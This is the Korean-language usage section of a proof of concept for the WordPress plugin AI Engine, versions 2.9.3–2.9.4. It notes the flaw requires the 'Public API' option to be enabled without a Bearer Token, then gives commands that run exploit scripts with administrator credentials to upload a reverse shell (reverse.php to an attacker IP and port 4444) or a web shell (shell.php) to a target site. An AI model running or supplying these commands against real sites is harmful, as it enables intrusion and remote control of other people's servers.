
워드프레스 플러그인 AI 엔진 2.9.3 - 2.9.4 개념 증명
Wordpress 플러그인 AI Engine 2.9.3 - 2.9.4 개념 증명
참고로 이 취약점은 “Public API” 옵션이 활성화되어 있고(기본적으로 비활성화됨), Bearer Token이 구성되어 있지 않으며, API를 보호하기 위한 사용자 지정 인증이 추가되어 있지 않은 경우에만 악용될 수 있습니다.
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
python3 exploit.py \
--url "http://target.com/" \
--username "Admin" \
--password "L87*********C4u" \
--file shell.php